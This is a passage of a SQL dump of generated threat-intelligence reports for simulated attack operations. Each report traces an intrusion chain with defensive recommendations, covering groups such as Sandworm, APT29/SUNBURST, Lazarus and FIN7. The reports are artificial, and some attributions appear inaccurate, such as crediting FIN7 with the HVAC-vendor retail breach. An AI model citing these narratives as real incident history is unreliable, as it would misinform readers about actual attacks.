(227, 44, 514, 8, NULL, NULL, '2026-01-06 01:34:24'),
(228, 45, 515, 1, 'In-Depth Analysis of Supply Chain Compromise', '### Overview\nThe initial alert indicates a compromised software update, typical of a supply chain attack. This technique is often employed to distribute malicious payloads widely and stealthily.\n\n### Key Findings\n- **Vendor Involvement**: The compromised update originated from a trusted vendor, indicating possible unauthorized access to their infrastructure.\n- **Distribution Scope**: Initial analysis suggests a widespread distribution affecting multiple sectors.\n\n### Recommendations\n- **Immediate Patch Review**: Verify the integrity of all recent updates and patches from associated vendors.\n- **Network Segmentation**: Implement network segmentation to contain any potential spread of malicious activity.\n\n### Next Steps\nWe anticipate potential destructive activities following the introduction of malicious components. Monitor for unusual disk activity, which may indicate MBR overwriting.', '2026-01-06 01:37:06'),
(229, 45, 516, 2, 'MBR Overwriting Detected: Sandworm\'s Signature', '### Overview\nFollowing the compromised software update, we have observed Master Boot Record (MBR) overwriting activity. This is a destructive action characteristic of Sandworm\'s tactics.\n\n### Key Indicators\n- **MBR Modification**: Unauthorized changes to the MBR have been logged, leading to potential system boot failures.\n- **System Recovery**: Attempts to recover the MBR have been partially successful, but full restoration is uncertain.\n\n### Recommendations\n- **Immediate System Backups**: Ensure that all critical data is backed up and secure.\n- **Forensic Analysis**: Engage forensic teams to analyze the altered MBR and identify further threats.\n\n### Next Steps\nGiven past Sandworm operations, expect potential credential harvesting as the next phase of the attack. Monitor for suspicious credential access activities.', '2026-01-06 01:37:06'),
(230, 45, 517, 3, 'Credential Harvesting via Mimikatz: A Deeper Threat', '### Overview\nCredential harvesting has been detected utilizing Mimikatz, a known tool for extracting account credentials from compromised systems.\n\n### Key Indicators\n- **Unauthorized Access Attempts**: Multiple failed and successful login attempts from unusual locations.\n- **Privileged Account Targeting**: Specific focus on accounts with elevated privileges.\n\n### Recommendations\n- **Account Lockdowns**: Immediately lockdown and reset passwords for compromised accounts.\n- **Multi-Factor Authentication**: Implement MFA to secure access to critical systems.\n\n### Next Steps\nPrepare for potential lateral movement within the network as the attacker leverages harvested credentials to propagate. Enhance monitoring for unusual internal network activity.', '2026-01-06 01:37:06'),
(231, 45, 518, 4, 'Lateral Movement and Data Exfiltration: Identifying the Attack Progression', '### Overview\nRapid lateral movement within the network has been identified, coupled with attempts to exfiltrate data.\n\n### Key Indicators\n- **Unusual Traffic Patterns**: High volumes of data transfers to external IPs not previously associated with the organization.\n- **Network Scanning**: Evidence of network scanning activities to identify further targets.\n\n### Recommendations\n- **Network Isolation**: Isolate affected segments to prevent further spread.\n- **Data Loss Prevention**: Strengthen DLP solutions to monitor and block unauthorized data transfers.\n\n### Conclusion\nThe operation has reached a critical stage with the potential for significant data loss. Immediate containment and remediation efforts are essential to minimize impact.', '2026-01-06 01:37:06'),
(232, 45, 519, 5, NULL, NULL, '2026-01-06 01:37:06'),
(233, 46, 520, 1, 'Investigation into Suspicious Network Traffic', '### Summary\nFollowing the detection of suspicious network traffic linked to a potential drive-by download, our team has initiated a comprehensive analysis to identify the source and nature of the traffic.\n\n### Findings\n- **Traffic Source**: The suspicious traffic originated from IP addresses associated with compromised websites known to distribute fake Adobe Flash updates.\n- **Payload Analysis**: Initial investigations suggest the payload is part of a phishing campaign aimed at delivering ransomware.\n\n### Next Steps\nContinue monitoring for further network anomalies and prepare for potential execution of malicious software as indicated by the observed traffic patterns.', '2026-01-06 01:39:37'),
(234, 46, 521, 2, 'Analysis of Unverified Flash Update Execution', '### Summary\nAn unverified Adobe Flash update has been executed on several endpoints. This execution is suspected to be part of the Callisto Group\'s ransomware campaign.\n\n### Findings\n- **Execution Method**: The update bypassed standard security checks, indicating sophisticated evasion techniques.\n- **Code Review**: Preliminary code analysis shows similarities with known ransomware families, suggesting the dropper is used to deploy DiskCryptor.\n\n### Next Steps\nConduct a detailed reverse engineering of the executed file to confirm its capabilities and potential payloads. Prepare defenses against ransomware activation.', '2026-01-06 01:39:37'),
(235, 46, 522, 3, 'DiskCryptor Ransomware Persistence Strategy', '### Summary\nDiskCryptor ransomware has been detected, indicating the persistence phase of the attack.\n\n### Findings\n- **Ransomware Behavior**: The ransomware has encrypted local drives and is configured to activate upon system reboot.\n- **Persistence Mechanism**: Utilizes bootloader modification to ensure ransomware executes at system startup.\n\n### Next Steps\nIsolate infected systems to prevent further spread. Begin decryption efforts and analyze the persistence mechanisms to develop countermeasures.', '2026-01-06 01:39:37'),
(236, 46, 523, 4, 'Investigation into Unauthorized SMB Traffic', '### Summary\nUnauthorized SMB traffic has been observed, suggesting lateral movement within the network.\n\n### Findings\n- **Propagation Method**: Ransomware is leveraging SMB protocol to spread across network shares.\n- **Targeted Systems**: Systems with outdated SMB configurations are particularly vulnerable.\n\n### Next Steps\nImplement network segmentation to contain the spread. Initiate internal audits to identify and patch vulnerable systems. Prepare for potential data exfiltration attempts.', '2026-01-06 01:39:37'),
(237, 46, 524, 5, NULL, NULL, '2026-01-06 01:39:37'),
(238, 47, 525, 1, 'Unauthorized Network Access: Initial Analysis', '### Overview\nThe initial breach was detected at 03:45 UTC, involving unauthorized access to the network managing the Olympic ceremony systems. Our analysis indicates the use of stolen credentials to bypass security protocols.\n\n### Details\n- **Entry Point**: Compromised VPN credentials likely obtained through phishing.\n- **Affected Systems**: Early identification shows infiltration in user authentication servers.\n\n### Next Steps\nInvestigation will focus on identifying the origin of the breach and monitoring for any further unauthorized activities. Anticipate potential execution of malicious scripts as attackers establish foothold.', '2026-01-06 01:44:46');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(239, 47, 526, 2, 'Malicious Script Execution: Compromise Analysis', '### Overview\nFollowing the initial breach, malicious scripts were executed on ceremony systems, indicating an escalation in the attack. These scripts aim to disrupt key functionalities during the event.\n\n### Details\n- **Execution Method**: Scripts were deployed via PowerShell to modify system configurations.\n- **Impact**: Disruption in media streaming services and live event broadcasting.\n\n### Insights\nThe attackers are utilizing tools consistent with known Sandworm TTPs, suggesting a sophisticated operation. Next, we will analyze for signs of persistence mechanisms being established.', '2026-01-06 01:44:46'),
(240, 47, 527, 3, 'Persistence Mechanisms: Backdoor Installation', '### Overview\nThe attackers have installed multiple backdoors to ensure continued access and control over the compromised systems.\n\n### Details\n- **Backdoor Types**: Custom RATs detected, allowing remote command execution.\n- **Installation Method**: Leveraged administrative privileges obtained from initial breach.\n\n### Next Steps\nWith persistence achieved, the threat actors are expected to attempt lateral movement to spread through critical infrastructure. Monitoring lateral traffic and securing adjacent systems is crucial.', '2026-01-06 01:44:46'),
(241, 47, 528, 4, 'Lateral Movement: Internal Threat Expansion', '### Overview\nThe attackers are actively moving laterally within the network, targeting critical systems essential for ceremony operations.\n\n### Details\n- **Techniques Used**: SMB protocol exploitation and credential dumping observed.\n- **Targets**: Focus on database servers and event coordination systems.\n\n### Insights\nTheir movement patterns suggest a high level of network knowledge, potentially indicating insider collaboration. The next phase may involve data exfiltration, aiming at sensitive information related to event operations and personnel.', '2026-01-06 01:44:46'),
(242, 47, 529, 5, NULL, NULL, '2026-01-06 01:44:46'),
(243, 48, 530, 1, NULL, NULL, '2026-01-06 02:36:36'),
(244, 48, 531, 2, 'Malicious Payload Deployment Analysis', '## Malicious Payload Deployment Analysis\n\n**Overview:**\nFollowing the initial access via the ASUS Update Utility compromise, threat actors have successfully deployed a malicious payload across affected systems. This payload is designed to execute upon installation of the compromised update.\n\n**Key Findings:**\n- The payload targets systems immediately after the ASUS Live Update installation.\n- Analysis indicates the payload includes a dropper that installs additional malware components.\n- The dropper executes with administrative privileges, allowing it to bypass user account controls.\n\n**Recommendations:**\n- Conduct a thorough scan of all systems for known indicators of compromise.\n- Employ behavioral analysis to detect unusual process execution linked to the update utility.\n\n**Next Steps:**\nFocus on understanding the persistence mechanisms established post-payload execution to maintain threat actor presence.', '2026-01-06 02:36:36'),
(245, 48, 532, 3, 'Backdoor Access and Persistence', '## Backdoor Access and Persistence\n\n**Overview:**\nPost-execution, the threat actors have established backdoor access, ensuring persistent presence on compromised systems. This allows them to maintain control and facilitate further exploitation.\n\n**Key Findings:**\n- A new service is created to run at startup, linked to the malicious payload.\n- Registry modifications detected to ensure backdoor persistence.\n- Backdoor communications are encrypted, complicating detection efforts.\n\n**Recommendations:**\n- Monitor for creation of unauthorized services and registry changes.\n- Implement endpoint detection and response (EDR) solutions to track anomalous behaviors.\n\n**Next Steps:**\nInvestigate potential lateral movement patterns and credentials that may have been compromised.', '2026-01-06 02:36:36'),
(246, 48, 533, 4, 'Lateral Movement and Credential Dumping', '## Lateral Movement and Credential Dumping\n\n**Overview:**\nWith established persistence, the threat actors are moving laterally within the network, harvesting credentials to gain access to additional systems.\n\n**Key Findings:**\n- Use of legitimate tools like Mimikatz to dump credentials from memory.\n- Compromised accounts exhibit unusual login patterns and access attempts.\n- Network traffic analysis reveals attempts to authenticate across multiple systems.\n\n**Recommendations:**\n- Reset credentials for impacted accounts and enforce multi-factor authentication.\n- Deploy network segmentation to limit the spread of lateral movement.\n\n**Next Steps:**\nFocus on identifying and mitigating data exfiltration attempts as attackers access sensitive information.', '2026-01-06 02:36:36'),
(247, 48, 534, 5, 'Data Harvesting and Exfiltration', '## Data Harvesting and Exfiltration\n\n**Overview:**\nThreat actors are actively harvesting sensitive data from compromised systems, preparing for exfiltration to external servers.\n\n**Key Findings:**\n- Large volumes of data being compressed and staged for transfer.\n- Use of encrypted channels to conceal data movement from detection.\n- Targeted data includes intellectual property and user credentials.\n\n**Recommendations:**\n- Monitor outbound traffic for anomalies and block unauthorized data transfers.\n- Implement data loss prevention (DLP) solutions to identify and protect sensitive data.\n\n**Next Steps:**\nDetermine the specific targets based on MAC addresses to understand threat actor intentions.', '2026-01-06 02:36:36'),
(248, 48, 535, 6, 'Targeted MAC Address Identification', '## Targeted MAC Address Identification\n\n**Overview:**\nInvestigation reveals that threat actors are targeting systems with specific MAC addresses, indicating a highly selective attack strategy.\n\n**Key Findings:**\n- Analysis of compromised systems shows a pattern of MAC address targeting.\n- Threat actors appear to prioritize high-value targets within the network.\n- This targeted approach minimizes detection and maximizes impact on selected assets.\n\n**Recommendations:**\n- Identify and isolate systems with targeted MAC addresses to prevent further compromise.\n- Conduct a detailed audit of affected systems to understand the scope of the breach.\n\n**Next Steps:**\nExamine ongoing command and control communications to gain insight into threat actor objectives.', '2026-01-06 02:36:36'),
(249, 48, 536, 7, 'Command and Control Communication Analysis', '## Command and Control Communication Analysis\n\n**Overview:**\nThreat actors maintain command and control communications to coordinate their activities across compromised systems.\n\n**Key Findings:**\n- Use of custom C2 protocols to evade detection by standard network defenses.\n- Communication patterns indicate periodic updates and tasking from external servers.\n- C2 infrastructure is resilient, leveraging multiple domains and IPs for redundancy.\n\n**Recommendations:**\n- Block known C2 domains and IP addresses identified during the investigation.\n- Employ network intrusion detection systems (NIDS) to monitor for C2 communication patterns.\n\n**Next Steps:**\nInvestigate any anti-forensic techniques employed by threat actors to cover their tracks and hinder analysis.', '2026-01-06 02:36:36'),
(250, 48, 537, 8, 'Cleanup and Anti-Forensic Techniques', '## Cleanup and Anti-Forensic Techniques\n\n**Overview:**\nAfter completing their objectives, threat actors are employing anti-forensic techniques to erase evidence and hinder investigation efforts.\n\n**Key Findings:**\n- Use of secure delete utilities to remove traces of malware and logs.\n- Manipulation of timestamps and metadata to obscure activity timelines.\n- Disabling of logging and monitoring tools on compromised systems.\n\n**Recommendations:**\n- Recover deleted files using advanced forensic tools to piece together the attack timeline.\n- Strengthen logging and monitoring capabilities to detect future anti-forensic activities.\n\n**Conclusion:**\nConduct a post-incident review to enhance defenses and reduce the likelihood of similar attacks in the future.', '2026-01-06 02:36:36'),
(251, 49, 538, 1, 'Analysis of Suspicious Cloud Service Access Patterns', '### Overview\nFollowing the detection of suspicious cloud service access, further analysis has identified anomalous login patterns from IP addresses linked to known Inception APT activities.\n\n### Findings\n- **Unusual Login Times:** Access attempts were recorded during non-business hours, consistent with tactics used by Inception APT to remain undetected.\n- **Geolocation:** The IP addresses originate from regions with a known Inception APT presence, notably within Eastern European countries.\n- **Access Attempts:** Credentials appear to have been compromised, as multiple failed login attempts were observed before successful access.\n\n### Recommendations\n- **Immediate Response:** Enforce multi-factor authentication for all cloud service accounts.\n- **Monitoring:** Increase monitoring of access logs for unusual patterns, particularly IP addresses from suspicious regions.\n- **User Awareness Training:** Conduct a security awareness program focusing on phishing and credential security.', '2026-01-07 22:29:04'),
(252, 49, 539, 2, 'Detection and Mitigation of Cloud Atlas Malware Execution', '### Overview\nThe execution of the Cloud Atlas malware was confirmed, marking a critical phase in the attack lifecycle. The malware has been detected in the network environment of Eastern European diplomatic entities.\n\n### Technical Details\n- **Malware Characteristics:** The Cloud Atlas malware uses DLL side-loading techniques to evade detection by traditional antivirus solutions.\n- **Execution Path:** The malware was executed via a trojanized document file, likely delivered through spear-phishing emails targeting diplomatic personnel.\n- **Command and Control (C2):** Evidence of C2 communication attempts to external IP addresses associated with Inception APT infrastructure was identified.\n\n### Recommended Actions\n- **Containment:** Isolate affected systems immediately and conduct a thorough forensic analysis to determine the extent of the compromise.\n- **Malware Removal:** Deploy endpoint detection and response (EDR) tools specifically configured to detect and remove Cloud Atlas malware.\n- **Network Hardening:** Implement strict egress filtering to block unauthorized C2 communications and review firewall rules to prevent similar incidents.', '2026-01-07 22:29:04'),
(253, 49, 540, 3, NULL, NULL, '2026-01-07 22:29:04'),
(254, 50, 541, 1, 'Analysis of Initial Access: Unauthorized Entry', '### Unauthorized Access Detected\nAfter detecting initial unauthorized access to the systems, analysis reveals that attackers exploited a known vulnerability in the VPN software used by the target organization. This vulnerability allowed the attackers to bypass authentication mechanisms and gain entry into the network.\n\n#### Key Findings:\n- **Exploitation Method**: Use of a zero-day vulnerability in the VPN software.\n- **Tools Used**: Custom scripts to automate the exploitation process.\n- **Entry Point**: Compromised credentials were used in conjunction with the exploit.\n\n#### Next Steps:\nPrepare to monitor for any execution of malicious payloads as attackers establish foothold.', '2026-01-07 22:29:58'),
(255, 50, 542, 2, 'Decoding the Execution Phase: Malicious Payload Activation', '### Execution of Malicious Payload\nUpon unauthorized access, attackers proceeded to deploy a malicious payload designed to serve as an initial beacon back to their command and control (C2) servers.\n\n#### Key Findings:\n- **Payload Type**: Custom malware designed to evade detection by common antivirus solutions.\n- **Execution Method**: Utilizes PowerShell scripts embedded within legitimate software updates.\n- **Objective**: Ensure continued access and prepare for installation of a more permanent backdoor.\n\n#### Next Steps:\nFocus on identifying any backdoor mechanisms being established for persistence in the system.', '2026-01-07 22:29:58'),
(256, 50, 543, 3, 'Establishing Persistence: Backdoor Deployment', '### Establishing Backdoor for Persistence\nThe attackers have successfully deployed a backdoor within the target\'s network, ensuring their ability to maintain access over an extended period.\n\n#### Key Findings:\n- **Backdoor Type**: Custom-developed Trojan with rootkit capabilities.\n- **Persistence Mechanism**: Installation of services that auto-start with the system.\n- **Command and Control**: Encrypted communications with C2 servers to avoid detection.\n\n#### Next Steps:\nPrepare for potential lateral movement as attackers explore the network to identify valuable targets.', '2026-01-07 22:29:58'),
(257, 50, 544, 4, 'Stealthy Lateral Movement: Network Exploration', '### Stealthy Lateral Movement\nThe attackers have begun moving laterally within the network, utilizing compromised credentials obtained in earlier stages.\n\n#### Key Findings:\n- **Movement Techniques**: Use of compromised RDP sessions and pass-the-hash attacks.\n- **Target Exploration**: Scanning for sensitive data repositories and high-value systems.\n- **Evasion Tactics**: Use of legitimate administrative tools to mask activities.\n\n#### Next Steps:\nAnticipate and monitor for potential data exfiltration attempts as attackers aim to extract sensitive information.', '2026-01-07 22:29:58'),
(258, 50, 545, 5, NULL, NULL, '2026-01-07 22:29:58'),
(259, 51, 546, 1, 'Unauthorized Code Execution Detected: Analysis and Implications', '## Overview\nUpon receiving the alert for a suspicious email attachment, further investigation revealed unauthorized code execution on the target system. This suggests that the initial access was leveraged to deploy a malicious payload, likely part of the Equation Group\'s toolkit.\n\n## Technical Details\n- **Payload Analysis**: The attachment contained a heavily obfuscated script, which upon execution, triggered a series of PowerShell commands.\n- **MD5 Collisions**: The payload\'s hash matches known Equation Group signatures, indicating potential use of MD5 collision techniques to disguise malicious binaries.\n\n## Implications\nThe execution of this code marks the transition from initial access to active compromise, setting the stage for persistent foothold establishment.', '2026-01-07 22:33:18'),
(260, 51, 547, 2, 'Malware Persistence Mechanism Activated: Deep Dive', '## Overview\nFollowing the unauthorized code execution, a persistence mechanism was activated, ensuring the malware\'s continuity post-reboot.\n\n## Technical Details\n- **Registry Keys**: Modification of registry keys was detected, a common technique used by Equation Group to maintain persistence.\n- **Advanced Techniques**: The malware employs advanced tactics such as DLL injection and the creation of scheduled tasks.\n\n## Insights\nThis persistence ensures that even if the system is restarted or the initial payload is removed, the malware remains operational, allowing for continued espionage activities and data collection.', '2026-01-07 22:33:18'),
(261, 51, 548, 3, 'Lateral Movement: Anomalous Network Activity Analysis', '## Overview\nPost-persistence, anomalous network activity was detected, indicating lateral movement within the network, a hallmark of sophisticated cyber espionage operations.\n\n## Technical Details\n- **Credential Dumping**: Tools associated with the Equation Group were used to harvest credentials, facilitating movement between systems.\n- **Network Traffic Analysis**: Unusual patterns were observed, including SMB connections and RPC calls to multiple endpoints.\n\n## Implications\nThis lateral movement allows the attacker to expand their reach within the network, accessing additional resources and potentially compromising further systems.', '2026-01-07 22:33:18'),
(262, 51, 549, 4, 'Sensitive Data Exfiltration: Monitoring and Mitigation', '## Overview\nThe final stage observed was the exfiltration of sensitive data, a critical concern in espionage operations attributed to the Equation Group.\n\n## Technical Details\n- **Data Transfer Methods**: The exfiltration was conducted using encrypted channels, masking the data flow from standard monitoring tools.\n- **Targets Identified**: Files related to strategic communications and proprietary technologies were specifically targeted.\n\n## Recommendations\n- **Immediate Response**: Implement network segmentation and enhanced monitoring to mitigate further exfiltration.\n- **Long-term Strategy**: Develop and deploy advanced anomaly detection systems to identify potential threats earlier in the attack chain.', '2026-01-07 22:33:18'),
(263, 51, 550, 5, NULL, NULL, '2026-01-07 22:33:18'),
(264, 52, 551, 1, 'Analysis of Spear Phishing Attack Vector', '### Overview\nAfter detecting suspicious initial access via spear phishing, further analysis reveals that targeted emails contained malicious attachments designed to exploit vulnerabilities in email clients.\n\n### Key Details\n- **Targeted Industries:** Manufacturing and Energy sectors.\n- **Attachments:** Utilized a mix of macros and embedded scripts.\n- **Exploited Vulnerabilities:** CVE-2023-XXXX, affecting older email client versions.\n\n### Recommendations\n- Immediate update of email clients to patch known vulnerabilities.\n- Conduct user training on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential malicious code execution as attackers aim to gain deeper system access.', '2026-01-07 22:35:14'),
(265, 52, 552, 2, 'Malicious Code Execution Analysis', '### Overview\nFollowing the execution of malicious code, system logs indicate the deployment of advanced payloads targeting industrial control systems.\n\n### Key Findings\n- **Payload Delivery:** Delivered through exploited email attachments.\n- **Target:** Focused on PLC firmware, aiming to disrupt operational processes.\n- **Observed Behavior:** Attempts to modify system configurations and interfere with normal operations.\n\n### Recommendations\n- Isolate affected machines to prevent further damage.\n- Implement network segmentation to limit exposure.\n\n### Next Steps\nFocus on rootkit persistence mechanisms that ensure continued attacker presence.', '2026-01-07 22:35:14'),
(266, 52, 553, 3, 'Rootkit Persistence Mechanism Identified', '### Overview\nThe rootkit deployed has established a robust persistence mechanism, enabling it to survive system reboots and evade standard detection.\n\n### Detailed Insights\n- **Persistence Techniques:** Utilizes bootkit components and modifies boot sectors.\n- **Evasion Tactics:** Employs anti-forensic techniques to avoid detection by security tools.\n- **Target Impact:** Continuous monitoring and disruption of PLC operations.\n\n### Recommendations\n- Conduct a thorough forensic analysis of boot sectors.\n- Employ specialized tools for rootkit detection and removal.\n\n### Next Steps\nMonitor for lateral movement as attackers attempt to expand their foothold.', '2026-01-07 22:35:14'),
(267, 52, 554, 4, 'Lateral Movement and Credential Dumping', '### Overview\nLateral movement detected suggests attackers are expanding their reach within the network by dumping credentials and leveraging compromised accounts.\n\n### Key Indicators\n- **Tools Used:** Mimikatz and custom scripts for credential extraction.\n- **Movement Patterns:** Transition from initial points of compromise to critical infrastructure nodes.\n- **Objective:** Gain control over additional systems and facilitate data exfiltration.\n\n### Recommendations\n- Reset compromised credentials immediately.\n- Deploy additional monitoring on critical systems to detect unauthorized access.\n\n### Next Steps\nPrepare to identify and mitigate data exfiltration attempts as attackers seek to extract sensitive information.', '2026-01-07 22:35:14'),
(268, 52, 555, 5, NULL, NULL, '2026-01-07 22:35:14'),
(269, 53, 556, 1, NULL, NULL, '2026-01-07 22:39:53'),
(270, 53, 557, 2, 'SUNBURST Backdoor Activation Analysis', '### Overview\nAfter initial access via the compromised SolarWinds update, the SUNBURST backdoor activates on the affected systems. This report delves into the mechanisms behind the activation.\n\n### Key Observations\n- **Activation Timing**: SUNBURST is designed to delay its execution to avoid raising immediate suspicion.\n- **Execution Methods**: Utilizes a combination of Windows processes to blend in with legitimate operations.\n\n### Recommendations\n- Conduct a thorough review of system logs during the initial days of compromise to identify unusual process behaviors.\n\n### Next Steps\nPrepare for potential persistence mechanisms adopted by SUNBURST to maintain foothold.', '2026-01-07 22:39:53'),
(271, 53, 558, 3, 'SUNBURST Persistence Mechanisms', '### Overview\nUpon activation, SUNBURST establishes persistence to ensure its continued presence on compromised systems.\n\n### Key Observations\n- **Registry Alterations**: Modifies registry keys to launch at startup.\n- **Scheduled Tasks**: Creates tasks that mimic valid system operations for periodic execution.\n\n### Recommendations\n- Audit registry changes and scheduled tasks for anomalies.\n\n### Next Steps\nInvestigate command and control (C2) communication methods utilized by SUNBURST.', '2026-01-07 22:39:53'),
(272, 53, 559, 4, 'C2 Communication via Domain Generation Algorithm', '### Overview\nSUNBURST employs a highly sophisticated domain generation algorithm (DGA) for its C2 communications, making detection challenging.\n\n### Key Observations\n- **Dynamic Domain Generation**: Regularly updates potential C2 domains, reducing the efficacy of static blocking.\n- **Encrypted Traffic**: Uses HTTPS for C2 communications to blend in with normal traffic.\n\n### Recommendations\n- Implement anomaly-based detection systems to flag unusual domain communications.\n\n### Next Steps\nFocus on identifying credential harvesting activities designed for lateral movement within the network.', '2026-01-07 22:39:53'),
(273, 53, 560, 5, 'Credential Harvesting and Lateral Movement', '### Overview\nWith a foothold established, APT29 utilizes SUNBURST to harvest credentials and facilitate lateral movement across networks.\n\n### Key Observations\n- **Credential Dumping Tools**: SUNBURST deploys tools to extract credentials from memory and secure storage.\n- **Lateral Movement Tactics**: Utilizes harvested credentials to access other systems, expanding its reach.\n\n### Recommendations\n- Monitor authentication logs for unusual access patterns and failed login attempts.\n\n### Next Steps\nPrepare for potential deployment of second-stage payloads following successful lateral movement.', '2026-01-07 22:39:53'),
(274, 53, 561, 6, 'Deployment of Second-Stage Payloads', '### Overview\nFollowing lateral movement, second-stage payloads are deployed to fulfill specific objectives of the operation.\n\n### Key Observations\n- **Payload Types**: Range from data collection tools to further exploitation utilities.\n- **Stealth Techniques**: Employs various methods to remain undetected, including fileless malware tactics.\n\n### Recommendations\n- Employ endpoint detection and response (EDR) solutions to identify and mitigate payload deployment.\n\n### Next Steps\nFocus on identifying data exfiltration methods utilized by the attackers.', '2026-01-07 22:39:53'),
(275, 53, 562, 7, 'Data Exfiltration via Stealth Channels', '### Overview\nAPT29 exfiltrates sensitive data using stealth channels to avoid detection.\n\n### Key Observations\n- **Stealth Channels**: Utilizes encrypted channels and legitimate services to mask data exfiltration.\n- **Data Types Targeted**: Includes intellectual property, sensitive communications, and credentials.\n\n### Recommendations\n- Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n\n### Next Steps\nInvestigate techniques used by APT29 to cover tracks and evade defenses.', '2026-01-07 22:39:53'),
(276, 53, 563, 8, 'Covering Tracks and Cleanup', '### Overview\nAs the operation concludes, APT29 employs various techniques to cover tracks and evade detection.\n\n### Key Observations\n- **Log Manipulation**: Alters or deletes logs to erase traces of their activities.\n- **File Removal**: Removes malware files and tools to prevent forensic analysis.\n\n### Recommendations\n- Regularly back up and secure logs offsite to prevent tampering.\n\n### Conclusion\nUnderstanding these techniques provides insight into APT29\'s strategies, aiding in future prevention and detection efforts.', '2026-01-07 22:39:53'),
(277, 54, 564, 1, 'Post-Phishing Attack Analysis', '### Context\nAfter the initial access was gained via a phishing attack, it\'s crucial to understand the tactics used by Lazarus Group to deliver the malicious payload.\n\n### Key Points\n- **Phishing Techniques**: The attackers utilized spear-phishing emails targeting specific employees at Sony Pictures.\n- **Email Content**: Emails included attachments or links leading to malicious sites.\n- **Employee Targets**: Employees with access to sensitive data were prioritized.\n\n### Next Steps\nPrepare for the possible deployment of malware, specifically the Destover malware, which is known to be used by Lazarus Group post-phishing.', '2026-01-07 22:40:38'),
(278, 54, 565, 2, 'Destover Malware Deployment Analysis', '### Context\nFollowing the phishing attack, Destover malware was executed within Sony Pictures\' network.\n\n### Key Points\n- **Malware Characteristics**: Destover is designed to wipe data and damage systems.\n- **Deployment Method**: Dropped via malicious email attachments or links.\n- **Initial Impact**: Systems were compromised, and data began to be wiped.\n\n### Next Steps\nPrepare for potential backdoor installations as attackers seek to establish persistence within the network.', '2026-01-07 22:40:38'),
(279, 54, 566, 3, 'Backdoor Installation and Persistence', '### Context\nWith the execution of the Destover malware, the attackers focus on maintaining access to the network.\n\n### Key Points\n- **Backdoor Tools**: Custom tools used by Lazarus Group to create persistent backdoors.\n- **Network Persistence**: Aim to maintain long-term access to the compromised systems.\n- **Detection and Evasion**: Techniques to evade detection by security systems.\n\n### Next Steps\nMonitor for signs of lateral movement as attackers map out the internal network.', '2026-01-07 22:40:38'),
(280, 54, 567, 4, 'Internal Network Reconnaissance', '### Context\nWith persistence established, the attackers began exploring the internal network of Sony Pictures.\n\n### Key Points\n- **Reconnaissance Tactics**: Use of legitimate credentials to move laterally.\n- **Target Identification**: Identification of high-value assets and data.\n- **Network Mapping**: Creation of a detailed map of the network\'s structure.\n\n### Next Steps\nFocus on identifying signs of data exfiltration activities, particularly through proxy chains.', '2026-01-07 22:40:38'),
(281, 54, 568, 5, 'Data Theft and Exfiltration Methods', '### Context\nAfter internal reconnaissance, the attackers initiated data exfiltration operations.\n\n### Key Points\n- **Exfiltration Techniques**: Data sent through encrypted channels and proxy chains to obfuscate origin.\n- **Target Data**: Intellectual property, confidential emails, and employee data.\n- **Stealth Tactics**: Use of legitimate network tools to blend with normal traffic.\n\n### Next Steps\nAnticipate attempts at log deletion to cover tracks and hinder forensic analysis.', '2026-01-07 22:40:38'),
(282, 54, 569, 6, 'Log Deletion and Evidence Destruction', '### Context\nAs data exfiltration concluded, the attackers shifted focus to destroying evidence.\n\n### Key Points\n- **Log Deletion**: System logs were systematically targeted and deleted.\n- **Forensic Challenges**: Hindered efforts to trace activities and attackers.\n- **Recovery Methods**: Possible methods to recover deleted logs for analysis.\n\n### Next Steps\nConduct a comprehensive analysis of the geopolitical motivations behind the attack, focusing on the interests of the Lazarus Group.', '2026-01-07 22:40:38'),
(283, 54, 570, 7, NULL, NULL, '2026-01-07 22:40:38'),
(284, 55, 571, 1, 'Report: Initial Access via HVAC Vendor Breach', '### Overview\nFollowing the compromise of the HVAC vendor\'s network, FIN7 leveraged stolen credentials to gain unauthorized access to the target retail system. This initial breach facilitated further infiltration into the target\'s infrastructure.\n\n### Key Findings\n- **Credential Theft**: FIN7 successfully harvested credentials from the HVAC vendor, exploiting weak security practices.\n- **Vulnerability Exploitation**: Existing vulnerabilities in the vendor\'s remote access protocols were manipulated to bypass security controls.\n\n### Next Steps\n- **Monitor for Malware Deployment**: With initial access achieved, anticipate the deployment of malicious software, specifically RAM-scraping malware, aimed at extracting sensitive data from Point-of-Sale (POS) systems.', '2026-01-08 22:01:14'),
(285, 55, 572, 2, 'Report: RAM-Scraping Malware Deployed', '### Overview\nFollowing initial access, FIN7 deployed RAM-scraping malware on the retailer\'s POS systems. This malware aims to capture unencrypted credit card data during transactions.\n\n### Key Findings\n- **Malware Characteristics**: The deployed malware is designed to scrape memory, extracting payment card information in real-time.\n- **Infection Vector**: POS systems were targeted via network access established through the compromised HVAC vendor credentials.\n\n### Next Steps\n- **Establishing Persistence**: It is critical to investigate methods used by FIN7 to maintain long-term access within the network, potentially through backdoors or additional malware components.', '2026-01-08 22:01:14'),
(286, 55, 573, 3, 'Report: Persistence Mechanisms Identified', '### Overview\nFIN7 has implemented various persistence mechanisms to ensure continued access to the retailer\'s network, complicating remediation efforts.\n\n### Key Findings\n- **Backdoor Installations**: Multiple backdoors have been identified, allowing FIN7 to regain access even after initial malware removal attempts.\n- **Scheduled Tasks and Services**: The attackers utilized scheduled tasks and modified system services to maintain their foothold.\n\n### Next Steps\n- **Lateral Movement Detection**: With persistence established, anticipate attempts to move laterally within the network, specifically towards the payment processing environments.', '2026-01-08 22:01:14'),
(287, 55, 574, 4, 'Report: Lateral Movement to Payment Network', '### Overview\nFIN7 successfully navigated laterally through the network, reaching the payment processing systems. This movement facilitated the exfiltration phase.\n\n### Key Findings\n- **Credential Reuse**: Previously compromised credentials were reused to access high-value systems.\n- **Network Mapping**: The attackers conducted extensive mapping of the internal network to identify critical assets.\n\n### Next Steps\n- **Data Exfiltration Monitoring**: With access to the payment network confirmed, focus on detecting and preventing the exfiltration of credit card information. Implement heightened monitoring of data flows leaving the network perimeter.', '2026-01-08 22:01:14'),
(288, 55, 575, 5, NULL, NULL, '2026-01-08 22:01:14'),
(289, 56, 576, 1, NULL, NULL, '2026-01-08 22:06:19'),
